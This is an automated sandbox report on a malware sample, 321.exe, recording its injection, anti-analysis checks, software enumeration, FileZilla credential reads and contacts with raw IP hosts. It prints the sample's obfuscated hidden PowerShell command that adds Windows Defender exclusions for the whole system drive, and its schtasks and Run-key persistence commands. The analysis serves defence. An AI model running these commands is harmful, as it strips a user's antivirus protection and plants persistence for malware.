RegOpenKeyExW April 24, 2023, 8:52 a.m.	regkey_r: {90120000-001B-0412-0000-0000000FF1CE} base_handle: 0x00000368 key_handle: 0x00000364 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001B-0412-0000-0000000FF1CE}	1
RegOpenKeyExW April 24, 2023, 8:52 a.m.	regkey_r: {90120000-001F-0409-0000-0000000FF1CE} base_handle: 0x00000368 key_handle: 0x00000364 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001F-0409-0000-0000000FF1CE}	1
RegOpenKeyExW April 24, 2023, 8:52 a.m.	regkey_r: {90120000-001F-0412-0000-0000000FF1CE} base_handle: 0x00000368 key_handle: 0x00000364 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001F-0412-0000-0000000FF1CE}	1
RegOpenKeyExW April 24, 2023, 8:52 a.m.	regkey_r: {90120000-0028-0412-0000-0000000FF1CE} base_handle: 0x00000368 key_handle: 0x00000364 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0028-0412-0000-0000000FF1CE}	1
RegOpenKeyExW April 24, 2023, 8:52 a.m.	regkey_r: {90120000-002C-0412-0000-0000000FF1CE} base_handle: 0x00000368 key_handle: 0x00000364 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-002C-0412-0000-0000000FF1CE}	1
RegOpenKeyExW April 24, 2023, 8:52 a.m.	regkey_r: {90120000-0030-0000-0000-0000000FF1CE} base_handle: 0x00000368 key_handle: 0x00000364 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0030-0000-0000-0000000FF1CE}	1
RegOpenKeyExW April 24, 2023, 8:52 a.m.	regkey_r: {90120000-0044-0412-0000-0000000FF1CE} base_handle: 0x00000368 key_handle: 0x00000364 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0044-0412-0000-0000000FF1CE}	1
RegOpenKeyExW April 24, 2023, 8:52 a.m.	regkey_r: {90120000-006E-0409-0000-0000000FF1CE} base_handle: 0x00000368 key_handle: 0x00000364 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-006E-0409-0000-0000000FF1CE}	1
RegOpenKeyExW April 24, 2023, 8:52 a.m.	regkey_r: {90120000-006E-0412-0000-0000000FF1CE} base_handle: 0x00000368 key_handle: 0x00000364 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-006E-0412-0000-0000000FF1CE}	1
RegOpenKeyExW April 24, 2023, 8:52 a.m.	regkey_r: {90120000-00A1-0412-0000-0000000FF1CE} base_handle: 0x00000368 key_handle: 0x00000364 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-00A1-0412-0000-0000000FF1CE}	1
RegOpenKeyExW April 24, 2023, 8:52 a.m.	regkey_r: {90120000-00BA-0409-0000-0000000FF1CE} base_handle: 0x00000368 key_handle: 0x00000364 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-00BA-0409-0000-0000000FF1CE}	1
RegOpenKeyExW April 24, 2023, 8:52 a.m.	regkey_r: {90120000-0114-0412-0000-0000000FF1CE} base_handle: 0x00000368 key_handle: 0x00000364 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0114-0412-0000-0000000FF1CE}	1
RegOpenKeyExW April 24, 2023, 8:52 a.m.	regkey_r: {939659F3-71D2-461F-B24D-91D05A4389B4} base_handle: 0x00000368 key_handle: 0x00000364 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{939659F3-71D2-461F-B24D-91D05A4389B4}	1
RegOpenKeyExW April 24, 2023, 8:52 a.m.	regkey_r: {9B84A461-3B4C-40E2-B44F-CE22E215EE40} base_handle: 0x00000368 key_handle: 0x00000364 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{9B84A461-3B4C-40E2-B44F-CE22E215EE40}	1
RegOpenKeyExW April 24, 2023, 8:52 a.m.	regkey_r: {d992c12e-cab2-426f-bde3-fb8c53950b0d} base_handle: 0x00000368 key_handle: 0x00000364 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{d992c12e-cab2-426f-bde3-fb8c53950b0d}	1

Terminates another process (3 events)

Time & API	Arguments	Status
NtTerminateProcess April 24, 2023, 8:52 a.m.	status_code: 0xffffffff process_identifier: 2824 process_handle: 0x00000590
NtTerminateProcess April 24, 2023, 8:45 a.m.	status_code: 0xc0000005 process_identifier: 604 process_handle: 0x0000000000000160
NtTerminateProcess April 24, 2023, 8:45 a.m.	status_code: 0xc0000005 process_identifier: 604 process_handle: 0x0000000000000160	1

Uses Windows utilities for basic Windows functionality (2 events)

cmdline	schtasks /create /sc daily /st 12:00 /f /tn "RegSvcs" /tr "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
cmdline	powershell "Start-Process <#xkagfzgnanuo#> powershell <#xkagfzgnanuo#> -Verb <#xkagfzgnanuo#> runAs" -WindowStyle hidden -Argument 'Add-MpPreference -ExclusionPath $env:SystemDrive -ExclusionExtension .exe, .dll -Force'

One or more of the buffers contains an embedded PE file (1 event)

buffer

Buffer with sha1: fd5076c932585151191d97fa90a1c6d8c7cbf39e

Communicates with host for which no DNS query was performed (4 events)

host	178.32.215.165
host	185.159.130.81
host	46.173.218.172
host	84.252.73.140

Allocates execute permission to another process indicative of possible code injection (1 event)

Time & API	Arguments	Status	Return	Repeated
NtAllocateVirtualMemory April 24, 2023, 8:52 a.m.	process_identifier: 2912 region_size: 1077248 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000002c	1	0	0

Checks for the presence of known windows from debuggers and forensic tools (50 out of 96 events)

Time & API	Arguments	Status	Return	Repeated
FindWindowA April 24, 2023, 8:52 a.m.	class_name: RegmonClass window_name:		0	0
FindWindowA April 24, 2023, 8:52 a.m.	class_name: RegmonClass window_name:		0	0
FindWindowA April 24, 2023, 8:52 a.m.	class_name: Registry Monitor - Sysinternals: www.sysinternals.com window_name:		0	0
FindWindowA April 24, 2023, 8:52 a.m.	class_name: 18467-41 window_name:		0	0
FindWindowA April 24, 2023, 8:52 a.m.	class_name: FilemonClass window_name:		0	0
FindWindowA April 24, 2023, 8:52 a.m.	class_name: FilemonClass window_name:		0	0
FindWindowA April 24, 2023, 8:52 a.m.	class_name: File Monitor - Sysinternals: www.sysinternals.com window_name:		0	0
FindWindowA April 24, 2023, 8:52 a.m.	class_name: PROCMON_WINDOW_CLASS window_name:		0	0
FindWindowA April 24, 2023, 8:52 a.m.	class_name: Process Monitor - Sysinternals: www.sysinternals.com window_name:		0	0
FindWindowA April 24, 2023, 8:52 a.m.	class_name: Regmonclass window_name:		0	0
FindWindowA April 24, 2023, 8:52 a.m.	class_name: Regmonclass window_name:		0	0
FindWindowA April 24, 2023, 8:52 a.m.	class_name: 18467-41 window_name:		0	0
FindWindowA April 24, 2023, 8:52 a.m.	class_name: Filemonclass window_name:		0	0
FindWindowA April 24, 2023, 8:52 a.m.	class_name: Filemonclass window_name:		0	0
FindWindowA April 24, 2023, 8:52 a.m.	class_name: PROCMON_WINDOW_CLASS window_name:		0	0
FindWindowA April 24, 2023, 8:52 a.m.	class_name: Regmonclass window_name:		0	0
FindWindowA April 24, 2023, 8:52 a.m.	class_name: Regmonclass window_name:		0	0
FindWindowA April 24, 2023, 8:52 a.m.	class_name: 18467-41 window_name:		0	0
FindWindowA April 24, 2023, 8:52 a.m.	class_name: Filemonclass window_name:		0	0
FindWindowA April 24, 2023, 8:52 a.m.	class_name: Filemonclass window_name:		0	0
FindWindowA April 24, 2023, 8:52 a.m.	class_name: PROCMON_WINDOW_CLASS window_name:		0	0
FindWindowA April 24, 2023, 8:52 a.m.	class_name: Regmonclass window_name:		0	0
FindWindowA April 24, 2023, 8:52 a.m.	class_name: Regmonclass window_name:		0	0
FindWindowA April 24, 2023, 8:52 a.m.	class_name: 18467-41 window_name:		0	0
FindWindowA April 24, 2023, 8:52 a.m.	class_name: Filemonclass window_name:		0	0
FindWindowA April 24, 2023, 8:52 a.m.	class_name: Filemonclass window_name:		0	0
FindWindowA April 24, 2023, 8:52 a.m.	class_name: PROCMON_WINDOW_CLASS window_name:		0	0
FindWindowA April 24, 2023, 8:52 a.m.	class_name: Regmonclass window_name:		0	0
FindWindowA April 24, 2023, 8:52 a.m.	class_name: Regmonclass window_name:		0	0
FindWindowA April 24, 2023, 8:52 a.m.	class_name: 18467-41 window_name:		0	0
FindWindowA April 24, 2023, 8:52 a.m.	class_name: Filemonclass window_name:		0	0
FindWindowA April 24, 2023, 8:52 a.m.	class_name: Filemonclass window_name:		0	0
FindWindowA April 24, 2023, 8:52 a.m.	class_name: PROCMON_WINDOW_CLASS window_name:		0	0
FindWindowA April 24, 2023, 8:52 a.m.	class_name: Regmonclass window_name:		0	0
FindWindowA April 24, 2023, 8:52 a.m.	class_name: Regmonclass window_name:		0	0
FindWindowA April 24, 2023, 8:52 a.m.	class_name: 18467-41 window_name:		0	0
FindWindowA April 24, 2023, 8:52 a.m.	class_name: Filemonclass window_name:		0	0
FindWindowA April 24, 2023, 8:52 a.m.	class_name: Filemonclass window_name:		0	0
FindWindowA April 24, 2023, 8:52 a.m.	class_name: PROCMON_WINDOW_CLASS window_name:		0	0
FindWindowA April 24, 2023, 8:52 a.m.	class_name: Regmonclass window_name:		0	0
FindWindowA April 24, 2023, 8:52 a.m.	class_name: Regmonclass window_name:		0	0
FindWindowA April 24, 2023, 8:52 a.m.	class_name: 18467-41 window_name:		0	0
FindWindowA April 24, 2023, 8:52 a.m.	class_name: Filemonclass window_name:		0	0
FindWindowA April 24, 2023, 8:52 a.m.	class_name: Filemonclass window_name:		0	0
FindWindowA April 24, 2023, 8:52 a.m.	class_name: PROCMON_WINDOW_CLASS window_name:		0	0
FindWindowA April 24, 2023, 8:52 a.m.	class_name: Regmonclass window_name:		0	0
FindWindowA April 24, 2023, 8:52 a.m.	class_name: Regmonclass window_name:		0	0
FindWindowA April 24, 2023, 8:52 a.m.	class_name: 18467-41 window_name:		0	0
FindWindowA April 24, 2023, 8:52 a.m.	class_name: Filemonclass window_name:		0	0
FindWindowA April 24, 2023, 8:52 a.m.	class_name: Filemonclass window_name:		0	0

Looks for the Windows Idle Time to determine the uptime (1 event)

Time & API	Arguments	Status	Return	Repeated
NtQuerySystemInformation April 24, 2023, 8:52 a.m.	information_class: 8 (SystemProcessorPerformanceInformation)	1	0	0

A process attempted to delay the analysis task. (1 event)

description

321.exe tried to sleep 2728342 seconds, actually delayed analysis time by 2728342 seconds

Checks the version of Bios, possibly for anti-virtualization (2 events)

registry	HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion
registry	HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion

Installs itself for autorun at Windows startup (2 events)

reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\RegSvcs				reg_value	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
cmdline	schtasks /create /sc daily /st 12:00 /f /tn "RegSvcs" /tr "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"

Harvests credentials from local FTP client softwares (2 events)

file	C:\Users\test22\AppData\Roaming\FileZilla\sitemanager.xml
file	C:\Users\test22\AppData\Roaming\FileZilla\recentservers.xml

Potential code injection by writing to the memory of another process (1 event)

Time & API	Arguments	Status	Return	Repeated
WriteProcessMemory April 24, 2023, 8:52 a.m.	buffer: @ base_address: 0x7efde008 process_identifier: 2912 process_handle: 0x0000002c	1	1	0

Collects information about installed applications (27 events)

Time & API	Arguments	Status
RegQueryValueExW April 24, 2023, 8:52 a.m.	key_handle: 0x00000364 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: EditPlus regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus\DisplayName	1
RegQueryValueExW April 24, 2023, 8:52 a.m.	key_handle: 0x00000364 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Enterprise 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\ENTERPRISE\DisplayName	1
RegQueryValueExW April 24, 2023, 8:52 a.m.	key_handle: 0x00000364 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Chrome regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome\DisplayName	1
RegQueryValueExW April 24, 2023, 8:52 a.m.	key_handle: 0x00000364 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: 한컴오피스 한글 2010 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean\DisplayName	1
RegQueryValueExW April 24, 2023, 8:52 a.m.	key_handle: 0x00000364 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: HttpWatch Professional 9.3.39 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{01B845D4-B73E-4CF7-A377-94BC7BB4F77B}\DisplayName	1
RegQueryValueExW April 24, 2023, 8:52 a.m.	key_handle: 0x00000364 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: 한컴오피스 한글 2010 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D91F7DA-F517-4727-9E62-B7EA978BE980}\DisplayName	1
RegQueryValueExW April 24, 2023, 8:52 a.m.	key_handle: 0x00000364 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Google Update Helper regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}\DisplayName	1
RegQueryValueExW April 24, 2023, 8:52 a.m.	key_handle: 0x00000364 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Access MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0015-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW April 24, 2023, 8:52 a.m.	key_handle: 0x00000364 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Excel MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0016-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW April 24, 2023, 8:52 a.m.	key_handle: 0x00000364 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office PowerPoint MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0018-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW April 24, 2023, 8:52 a.m.	key_handle: 0x00000364 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Publisher MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0019-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW April 24, 2023, 8:52 a.m.	key_handle: 0x00000364 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Outlook MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001A-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW April 24, 2023, 8:52 a.m.	key_handle: 0x00000364 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Word MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001B-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW April 24, 2023, 8:52 a.m.	key_handle: 0x00000364 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Proof (English) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001F-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW April 24, 2023, 8:52 a.m.	key_handle: 0x00000364 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Proof (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001F-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW April 24, 2023, 8:52 a.m.	key_handle: 0x00000364 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office IME (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0028-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW April 24, 2023, 8:52 a.m.	key_handle: 0x00000364 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Proofing (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-002C-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW April 24, 2023, 8:52 a.m.	key_handle: 0x00000364 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Enterprise 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0030-0000-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW April 24, 2023, 8:52 a.m.	key_handle: 0x00000364 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office InfoPath MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0044-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW April 24, 2023, 8:52 a.m.	key_handle: 0x00000364 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Shared MUI (English) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-006E-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW April 24, 2023, 8:52 a.m.	key_handle: 0x00000364 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Shared MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-006E-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW April 24, 2023, 8:52 a.m.	key_handle: 0x00000364 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office OneNote MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-00A1-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW April 24, 2023, 8:52 a.m.	key_handle: 0x00000364 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Groove MUI (English) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-00BA-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW April 24, 2023, 8:52 a.m.	key_handle: 0x00000364 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Groove Setup Metadata MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0114-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW April 24, 2023, 8:52 a.m.	key_handle: 0x00000364 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Adobe Flash Player 13 ActiveX regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{939659F3-71D2-461F-B24D-91D05A4389B4}\DisplayName	1
RegQueryValueExW April 24, 2023, 8:52 a.m.	key_handle: 0x00000364 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Adobe Flash Player 13 NPAPI regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{9B84A461-3B4C-40E2-B44F-CE22E215EE40}\DisplayName	1
RegQueryValueExW April 24, 2023, 8:52 a.m.	key_handle: 0x00000364 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.24215 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{d992c12e-cab2-426f-bde3-fb8c53950b0d}\DisplayName	1

Used NtSetContextThread to modify a thread in a remote process indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2784 called NtSetContextThread to modify thread in remote process 2912
NtSetContextThread April 24, 2023, 8:52 a.m.	registers.eip: 1995571652 registers.esp: 4062828 registers.edi: 0 registers.eax: 4770222 registers.ebp: 0 registers.edx: 0 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0 thread_handle: 0x00000020 process_identifier: 2912	1	0	0

One or more non-whitelisted processes were created (6 events)

parent_process	chrome.exe	martian_process	"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=watcher --main-thread-id=812 --on-initialized-event-handle=312 --parent-handle=316 /prefetch:6
parent_process	chrome.exe	martian_process	"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\test22\AppData\Local\Google\Chrome\User DataUYQOJ" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\test22\AppData\Local\Google\Chrome\User DataUYQOJ\Crashpad" "--metrics-dir=C:\Users\test22\AppData\Local\Google\Chrome\User DataUYQOJ" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=65.0.3325.181 --initial-client-data=0x90,0x94,0x98,0x8c,0x9c,0x7fef42df1e8,0x7fef42df1f8,0x7fef42df208
parent_process	chrome.exe	martian_process	"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=renderer --use-gl=osmesa --disable-gpu-compositing --service-pipe-token=B1AB0C9BC1D259F23D5C4A2C2FB7C4DF --lang=en-US --headless --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --service-request-channel-token=B1AB0C9BC1D259F23D5C4A2C2FB7C4DF --renderer-client-id=2 --mojo-platform-channel-handle=1168 /prefetch:1
parent_process	chrome.exe	martian_process	"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\test22\AppData\Local\Temp --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod= --annotation=ver= --initial-client-data=0x154,0x158,0x15c,0x150,0x160,0x7fef3fc7218,0x7fef3fc7228,0x7fef3fc7238
parent_process	powershell.exe	martian_process	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath $env:SystemDrive -ExclusionExtension .exe, .dll -Force
parent_process	powershell.exe	martian_process	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:SystemDrive -ExclusionExtension .exe, .dll -Force

Found URLs in memory pointing to an IP address rather than a domain (potentially indicative of Command & Control traffic) (1 event)

url	http://127.0.0.1

Resumed a suspended thread in a remote process potentially indicative of process injection (32 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2784 resumed a thread in remote process 2912
Process injection	Process 2212 resumed a thread in remote process 604
NtResumeThread April 24, 2023, 8:52 a.m.	thread_handle: 0x00000020 suspend_count: 1 process_identifier: 2912	1	0	0
NtResumeThread April 24, 2023, 8:45 a.m.	thread_handle: 0x000000000000012c suspend_count: 2 process_identifier: 604	1	0	0
NtResumeThread April 24, 2023, 8:45 a.m.	thread_handle: 0x000000000000012c suspend_count: 2 process_identifier: 604	1	0	0
NtResumeThread April 24, 2023, 8:45 a.m.	thread_handle: 0x000000000000012c suspend_count: 2 process_identifier: 604	1	0	0
NtResumeThread April 24, 2023, 8:45 a.m.	thread_handle: 0x000000000000012c suspend_count: 2 process_identifier: 604	1	0	0
NtResumeThread April 24, 2023, 8:45 a.m.	thread_handle: 0x000000000000012c suspend_count: 2 process_identifier: 604	1	0	0
NtResumeThread April 24, 2023, 8:45 a.m.	thread_handle: 0x000000000000012c suspend_count: 2 process_identifier: 604	1	0	0
NtResumeThread April 24, 2023, 8:45 a.m.	thread_handle: 0x000000000000012c suspend_count: 2 process_identifier: 604	1	0	0
NtResumeThread April 24, 2023, 8:45 a.m.	thread_handle: 0x000000000000012c suspend_count: 2 process_identifier: 604	1	0	0
NtResumeThread April 24, 2023, 8:45 a.m.	thread_handle: 0x000000000000012c suspend_count: 2 process_identifier: 604	1	0	0
NtResumeThread April 24, 2023, 8:45 a.m.	thread_handle: 0x000000000000012c suspend_count: 2 process_identifier: 604	1	0	0
NtResumeThread April 24, 2023, 8:45 a.m.	thread_handle: 0x000000000000012c suspend_count: 2 process_identifier: 604	1	0	0
NtResumeThread April 24, 2023, 8:45 a.m.	thread_handle: 0x000000000000012c suspend_count: 2 process_identifier: 604	1	0	0
NtResumeThread April 24, 2023, 8:45 a.m.	thread_handle: 0x000000000000012c suspend_count: 2 process_identifier: 604	1	0	0
NtResumeThread April 24, 2023, 8:45 a.m.	thread_handle: 0x000000000000012c suspend_count: 2 process_identifier: 604	1	0	0
NtResumeThread April 24, 2023, 8:45 a.m.	thread_handle: 0x000000000000012c suspend_count: 2 process_identifier: 604	1	0	0
NtResumeThread April 24, 2023, 8:45 a.m.	thread_handle: 0x000000000000012c suspend_count: 2 process_identifier: 604	1	0	0
NtResumeThread April 24, 2023, 8:45 a.m.	thread_handle: 0x000000000000012c suspend_count: 2 process_identifier: 604	1	0	0
NtResumeThread April 24, 2023, 8:45 a.m.	thread_handle: 0x000000000000012c suspend_count: 2 process_identifier: 604	1	0	0
NtResumeThread April 24, 2023, 8:45 a.m.	thread_handle: 0x000000000000012c suspend_count: 2 process_identifier: 604	1	0	0
NtResumeThread April 24, 2023, 8:45 a.m.	thread_handle: 0x000000000000012c suspend_count: 2 process_identifier: 604	1	0	0
NtResumeThread April 24, 2023, 8:45 a.m.	thread_handle: 0x000000000000012c suspend_count: 2 process_identifier: 604	1	0	0
NtResumeThread April 24, 2023, 8:45 a.m.	thread_handle: 0x000000000000012c suspend_count: 2 process_identifier: 604	1	0	0
NtResumeThread April 24, 2023, 8:45 a.m.	thread_handle: 0x000000000000012c suspend_count: 2 process_identifier: 604	1	0	0
NtResumeThread April 24, 2023, 8:45 a.m.	thread_handle: 0x000000000000012c suspend_count: 2 process_identifier: 604	1	0	0
NtResumeThread April 24, 2023, 8:45 a.m.	thread_handle: 0x000000000000012c suspend_count: 2 process_identifier: 604	1	0	0
NtResumeThread April 24, 2023, 8:45 a.m.	thread_handle: 0x000000000000012c suspend_count: 2 process_identifier: 604	1	0	0
NtResumeThread April 24, 2023, 8:45 a.m.	thread_handle: 0x000000000000012c suspend_count: 2 process_identifier: 604	1	0	0
NtResumeThread April 24, 2023, 8:45 a.m.	thread_handle: 0x000000000000012c suspend_count: 2 process_identifier: 604	1	0	0
NtResumeThread April 24, 2023, 8:45 a.m.	thread_handle: 0x000000000000012c suspend_count: 2 process_identifier: 604	1	0	0

Creates a suspicious Powershell process (1 event)

option

-windowstyle hidden

value

Attempts to execute command with a hidden window

Detects Virtual Machines through their custom firmware (1 event)

Time & API	Arguments	Status	Return	Repeated
NtQuerySystemInformation April 24, 2023, 8:52 a.m.	information_class: 76 (SystemFirmwareTableInformation)		3221225507	0
